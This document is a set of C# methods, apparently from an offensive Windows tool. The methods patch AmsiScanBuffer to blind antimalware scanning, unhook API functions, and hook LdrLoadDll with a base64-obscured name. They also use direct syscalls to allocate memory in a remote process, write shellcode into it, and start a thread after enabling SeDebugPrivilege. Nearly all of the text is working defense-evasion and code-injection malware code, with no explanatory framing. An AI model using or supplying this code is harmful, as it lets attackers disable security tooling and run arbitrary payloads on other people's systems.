public unsafe bool unhookSyscall(string dllName, string apiCall, byte[] content) { uint oldProtect = 0, x = 0; DInvoke.PE.PE_MANUAL_MAP moduleDetails = sysCall.getMappedModule("C:\\Windows\\System32\\kernel32.dll"); object[] loadLibrary = { dllName }; var addr = (IntPtr)DInvoke.Generic.CallMappedDLLModuleExport(moduleDetails.PEINFO, moduleDetails.ModuleBase, "LoadLibraryA", typeof(DInvoke.Win32.DELEGATES.LoadLibrary), loadLibrary); object[] procAddress = { addr, apiCall }; var address = (IntPtr)DInvoke.Generic.CallMappedDLLModuleExport(moduleDetails.PEINFO, moduleDetails.ModuleBase, "GetProcAddress", typeof(DInvoke.Win32.DELEGATES.GetProcAddress), procAddress); if (address == IntPtr.Zero) { return(false); } object[] parameters = { (IntPtr)(-1), address, (UIntPtr)13, (uint)0x004, oldProtect }; IntPtr response = (IntPtr)DInvoke.Generic.CallMappedDLLModuleExport(moduleDetails.PEINFO, moduleDetails.ModuleBase, "VirtualProtectEx", typeof(DInvoke.Win32.DELEGATES.VirtualProtectEx), parameters); oldProtect = (uint)parameters[4]; byte *originalSitePointer = (byte *)address.ToPointer(); for (int k = 0; k < content.Length; k++) { *(originalSitePointer + k) = content[k]; } return(true); }
public unsafe bool Uninstall() { uint oldProtect = 0, x = 0; DInvoke.PE.PE_MANUAL_MAP moduleDetails = sysCall.getMappedModule("C:\\Windows\\System32\\kernel32.dll"); object[] procAddress = { libraryAddress, Encoding.UTF8.GetString(Convert.FromBase64String("TGRyTG9hZERsbA==")) }; var address = (IntPtr)DInvoke.Generic.CallMappedDLLModuleExport(moduleDetails.PEINFO, moduleDetails.ModuleBase, "GetProcAddress", typeof(DInvoke.Win32.DELEGATES.GetProcAddress), procAddress); if (address == IntPtr.Zero) { return(false); } object[] parameters = { (IntPtr)(-1), address, (UIntPtr)13, (uint)0x004, oldProtect }; IntPtr response = (IntPtr)DInvoke.Generic.CallMappedDLLModuleExport(moduleDetails.PEINFO, moduleDetails.ModuleBase, "VirtualProtectEx", typeof(DInvoke.Win32.DELEGATES.VirtualProtectEx), parameters); oldProtect = (uint)parameters[4]; byte *originalSitePointer = (byte *)address.ToPointer(); for (int k = 0; k < originalOpcodes.Length; k++) { *(originalSitePointer + k) = originalOpcodes[k]; } parameters = new object[] { (IntPtr)(-1), address, (UIntPtr)13, oldProtect, x }; response = (IntPtr)DInvoke.Generic.CallMappedDLLModuleExport(moduleDetails.PEINFO, moduleDetails.ModuleBase, "VirtualProtectEx", typeof(DInvoke.Win32.DELEGATES.VirtualProtectEx), parameters); return(true); }
private static void ChangeBytes(byte[] patch) { try { // library to load object[] LoadLibparams = { "amsi.dll" }; Console.WriteLine("[>] Manually mapping kernel32.dll into current process memory \n"); DInvoke.PE.PE_MANUAL_MAP moduleDetails = DInvoke.Map.MapModuleToMemory("C:\\Windows\\System32\\kernel32.dll"); Console.WriteLine("\n[>] Module Base : " + string.Format("{0:X}", moduleDetails.ModuleBase.ToInt64()) + "\n"); // Call LoadLibraryA for the lib from above var lib = (IntPtr)DInvoke.DynamicGeneric.CallMappedDLLModuleExport(moduleDetails.PEINFO, moduleDetails.ModuleBase, "LoadLibraryA", typeof(LoadLib), LoadLibparams); Console.WriteLine("[>] Process Handle : " + string.Format("{0:X}", lib.ToInt64()) + "\n"); // Function to patch object[] GetProcAddressparams = { lib, "AmsiScanBuffer" }; // Parsing _PEB_LDR_DATA structure of kernel32.dll IntPtr pkernel32 = DInvoke.DynamicGeneric.GetPebLdrModuleEntry("kernel32.dll"); // Get GetProcAddress Address var pLoadLibrary = DInvoke.DynamicGeneric.GetExportAddress(pkernel32, "GetProcAddress"); // Actually Call GetProcAddress for the function mentioned above var addr = (IntPtr)DInvoke.DynamicGeneric.DynamicFunctionInvoke(pLoadLibrary, typeof(GProcAddr), ref GetProcAddressparams); Console.WriteLine("[>] Patch address : " + string.Format("{0:X}", addr.ToInt64()) + "\n"); uint oldProtect = 0; // NtProtectVirtualMemory Syscall IntPtr stub = DInvoke.DynamicGeneric.GetSyscallStub("NtProtectVirtualMemory"); NtProtectVirtualMemory NtProtectVirtualMemory = (NtProtectVirtualMemory)Marshal.GetDelegateForFunctionPointer(stub, typeof(NtProtectVirtualMemory)); Process thisproc = Process.GetCurrentProcess(); // Save value of addr as this is increased by NtProtectVirtualMemory IntPtr oldaddress = addr; var regionSize = (IntPtr)patch.Length; oldProtect = 0; var result = NtProtectVirtualMemory( thisproc.Handle, ref addr, ref regionSize, 0x40, ref oldProtect); if (result == 0) { Console.WriteLine("[+] NtProtectVirtualMemory success, going to patch it now!\n"); } else { Console.WriteLine("[-] NtProtectVirtualMemory failed :-(\n"); Console.WriteLine("[-] Error code: " + result + "\n"); } Console.WriteLine("[>] Patching at address : " + string.Format("{0:X}", oldaddress.ToInt64()) + "\n"); Marshal.Copy(patch, 0, oldaddress, patch.Length); regionSize = (IntPtr)patch.Length; uint newoldProtect = 0; // CleanUp permissions back to oldprotect result = NtProtectVirtualMemory( thisproc.Handle, ref oldaddress, ref regionSize, oldProtect, ref newoldProtect); if (result == 0) { Console.WriteLine("[+] NtProtectVirtualMemory set back to oldprotect!\n"); } else { Console.WriteLine("[-] NtProtectVirtualMemory to restore oldprotect failed.\n"); Console.WriteLine("[-] Error code: " + result + "\n"); } } catch (Exception e) { Console.WriteLine(" [x] {0}", e.Message); Console.WriteLine(" [x] {0}", e.InnerException); } }
private static unsafe void ExecuteShellCodeInMemory(object args) { var parameterArguments = (object[])args; var sc = (byte[])parameterArguments[0]; var sysCall = (SysCallManager)parameterArguments[1]; var pid = (int)parameterArguments[2]; var handle = Process.GetCurrentProcess().Handle; if (pid != -1) { var token = IntPtr.Zero; Utils.GetProcessToken(Process.GetCurrentProcess().Handle, DInvoke.Win32.WinNT._TOKEN_ACCESS_FLAGS.TokenAdjustPrivileges, out token, sysCall); var l = new List <string>(); l.Add("SeDebugPrivilege"); Utils.EnablePrivileges(token, l, sysCall); Utils.GetProcessHandle(pid, out handle, DInvoke.Win32.Kernel32.ProcessAccessFlags.PROCESS_CREATE_THREAD | DInvoke.Win32.Kernel32.ProcessAccessFlags.PROCESS_QUERY_INFORMATION | DInvoke.Win32.Kernel32.ProcessAccessFlags.PROCESS_VM_OPERATION | DInvoke.Win32.Kernel32.ProcessAccessFlags.PROCESS_VM_WRITE | DInvoke.Win32.Kernel32.ProcessAccessFlags.PROCESS_VM_READ, sysCall); } try { var baseAddress = IntPtr.Zero; var shellCode = sysCall.GetSysCallAsm("NtAllocateVirtualMemory"); DInvoke.PE.PE_MANUAL_MAP moduleDetails = sysCall.getMappedModule("C:\\Windows\\System32\\kernel32.dll"); object[] virtualAlloc = { IntPtr.Zero, (UIntPtr)shellCode.Length, DInvoke.Win32.Kernel32.MemoryAllocationFlags.Commit | DInvoke.Win32.Kernel32.MemoryAllocationFlags.Reserve, DInvoke.Win32.Kernel32.MemoryProtectionFlags.ReadWrite }; var shellCodeBuffer = (IntPtr)DInvoke.Generic.CallMappedDLLModuleExport(moduleDetails.PEINFO, moduleDetails.ModuleBase, "VirtualAlloc", typeof(DInvoke.Win32.DELEGATES.VirtualAlloc), virtualAlloc); Marshal.Copy(shellCode, 0, shellCodeBuffer, shellCode.Length); var sysCallDelegate = Marshal.GetDelegateForFunctionPointer(shellCodeBuffer, typeof(NtAllocateVirtualMemory)); var arguments = new object[] { handle, baseAddress, (uint)0, (UIntPtr)(sc.Length + 1), DInvoke.Win32.Kernel32.MemoryAllocationFlags.Reserve | DInvoke.Win32.Kernel32.MemoryAllocationFlags.Commit, DInvoke.Win32.Kernel32.MemoryProtectionFlags.ExecuteReadWrite }; uint oldProtect = 0; object[] parameters = { (IntPtr)(-1), shellCodeBuffer, (UIntPtr)shellCode.Length, (uint)DInvoke.Win32.Kernel32.MemoryProtectionFlags.ExecuteRead, oldProtect }; IntPtr response = (IntPtr)DInvoke.Generic.CallMappedDLLModuleExport(moduleDetails.PEINFO, moduleDetails.ModuleBase, "VirtualProtectEx", typeof(DInvoke.Win32.DELEGATES.VirtualProtectEx), parameters); var returnValue = sysCallDelegate.DynamicInvoke(arguments); if ((int)returnValue != 0) { return; } baseAddress = (IntPtr)arguments[1]; shellCode = sysCall.GetSysCallAsm("NtWriteVirtualMemory"); object[] virtualAlloc2 = { IntPtr.Zero, (UIntPtr)shellCode.Length, DInvoke.Win32.Kernel32.MemoryAllocationFlags.Commit | DInvoke.Win32.Kernel32.MemoryAllocationFlags.Reserve, DInvoke.Win32.Kernel32.MemoryProtectionFlags.ReadWrite }; shellCodeBuffer = (IntPtr)DInvoke.Generic.CallMappedDLLModuleExport(moduleDetails.PEINFO, moduleDetails.ModuleBase, "VirtualAlloc", typeof(DInvoke.Win32.DELEGATES.VirtualAlloc), virtualAlloc2); Marshal.Copy(shellCode, 0, shellCodeBuffer, shellCode.Length); sysCallDelegate = Marshal.GetDelegateForFunctionPointer(shellCodeBuffer, typeof(NtWriteVirtualMemory)); arguments = new object[] { handle, baseAddress, sc, (UIntPtr)(sc.Length + 1), IntPtr.Zero }; parameters = new object[] { (IntPtr)(-1), shellCodeBuffer, (UIntPtr)shellCode.Length, (uint)DInvoke.Win32.Kernel32.MemoryProtectionFlags.ExecuteRead, oldProtect }; response = (IntPtr)DInvoke.Generic.CallMappedDLLModuleExport(moduleDetails.PEINFO, moduleDetails.ModuleBase, "VirtualProtectEx", typeof(DInvoke.Win32.DELEGATES.VirtualProtectEx), parameters); returnValue = sysCallDelegate.DynamicInvoke(arguments); baseAddress = (IntPtr)arguments[1]; if ((int)returnValue != 0) { return; } var a = new MyBuffer64(); var b = new MyBuffer64(); var u = new Unknown64(); u.Size = (uint)Marshal.SizeOf(u); u.Unknown1 = 65539; u.Unknown2 = 16; u.UnknownPtr = &a; u.Unknown4 = 65540; u.Unknown5 = 8; u.Unknown6 = 0; u.UnknownPtr2 = &b; u.Unknown3 = 0; shellCode = sysCall.GetSysCallAsm("NtCreateThreadEx"); object[] virtualAlloc3 = { IntPtr.Zero, (UIntPtr)shellCode.Length, DInvoke.Win32.Kernel32.MemoryAllocationFlags.Commit | DInvoke.Win32.Kernel32.MemoryAllocationFlags.Reserve, DInvoke.Win32.Kernel32.MemoryProtectionFlags.ReadWrite }; shellCodeBuffer = (IntPtr)DInvoke.Generic.CallMappedDLLModuleExport(moduleDetails.PEINFO, moduleDetails.ModuleBase, "VirtualAlloc", typeof(DInvoke.Win32.DELEGATES.VirtualAlloc), virtualAlloc3); Marshal.Copy(shellCode, 0, shellCodeBuffer, shellCode.Length); sysCallDelegate = Marshal.GetDelegateForFunctionPointer(shellCodeBuffer, typeof(NtCreateThreadEx64)); arguments = new object[] { IntPtr.Zero, 0x001FFFFF, IntPtr.Zero, handle, baseAddress, IntPtr.Zero, false, (ulong)0, (ulong)0, (ulong)0, u }; parameters = new object[] { (IntPtr)(-1), shellCodeBuffer, (UIntPtr)shellCode.Length, (uint)DInvoke.Win32.Kernel32.MemoryProtectionFlags.ExecuteRead, oldProtect }; response = (IntPtr)DInvoke.Generic.CallMappedDLLModuleExport(moduleDetails.PEINFO, moduleDetails.ModuleBase, "VirtualProtectEx", typeof(DInvoke.Win32.DELEGATES.VirtualProtectEx), parameters); returnValue = sysCallDelegate.DynamicInvoke(arguments); } catch { } }
public unsafe bool Install() { uint oldProtect = 0, x = 0; DInvoke.PE.PE_MANUAL_MAP moduleDetails = sysCall.getMappedModule("C:\\Windows\\System32\\kernel32.dll"); object[] loadLibrary = { "ntdll.dll" }; libraryAddress = (IntPtr)DInvoke.Generic.CallMappedDLLModuleExport(moduleDetails.PEINFO, moduleDetails.ModuleBase, "LoadLibraryA", typeof(DInvoke.Win32.DELEGATES.LoadLibrary), loadLibrary); object[] procAddress = { libraryAddress, Encoding.UTF8.GetString(Convert.FromBase64String("TGRyTG9hZERsbA==")) }; var address = (IntPtr)DInvoke.Generic.CallMappedDLLModuleExport(moduleDetails.PEINFO, moduleDetails.ModuleBase, "GetProcAddress", typeof(DInvoke.Win32.DELEGATES.GetProcAddress), procAddress); if (address == IntPtr.Zero) { return(false); } object[] parameters = { (IntPtr)(-1), address, (UIntPtr)13, (uint)0x004, oldProtect }; IntPtr response = (IntPtr)DInvoke.Generic.CallMappedDLLModuleExport(moduleDetails.PEINFO, moduleDetails.ModuleBase, "VirtualProtectEx", typeof(DInvoke.Win32.DELEGATES.VirtualProtectEx), parameters); oldProtect = (uint)parameters[4]; var m = typeof(HookManager).GetMethod("hookFunc"); RuntimeHelpers.PrepareMethod(m.MethodHandle); IntPtr replacementSite = m.MethodHandle.GetFunctionPointer(); byte *originalSitePointer = (byte *)address.ToPointer(); for (int k = 0; k < originalOpcodes.Length; k++) { originalOpcodes[k] = *(originalSitePointer + k); } if (is64BitsProcessor()) { *originalSitePointer = 0x49; *(originalSitePointer + 1) = 0xBB; *((ulong *)(originalSitePointer + 2)) = (ulong)replacementSite.ToInt64(); //sets 8 bytes //jmp r11 *(originalSitePointer + 10) = 0x41; *(originalSitePointer + 11) = 0xFF; *(originalSitePointer + 12) = 0xE3; } else { *originalSitePointer = 0x68; *((uint *)(originalSitePointer + 1)) = (uint)replacementSite.ToInt32(); //sets 4 bytes //ret *(originalSitePointer + 5) = 0xC3; } parameters = new object[] { (IntPtr)(-1), address, (UIntPtr)13, oldProtect, x }; response = (IntPtr)DInvoke.Generic.CallMappedDLLModuleExport(moduleDetails.PEINFO, moduleDetails.ModuleBase, "VirtualProtectEx", typeof(DInvoke.Win32.DELEGATES.VirtualProtectEx), parameters); return(true); }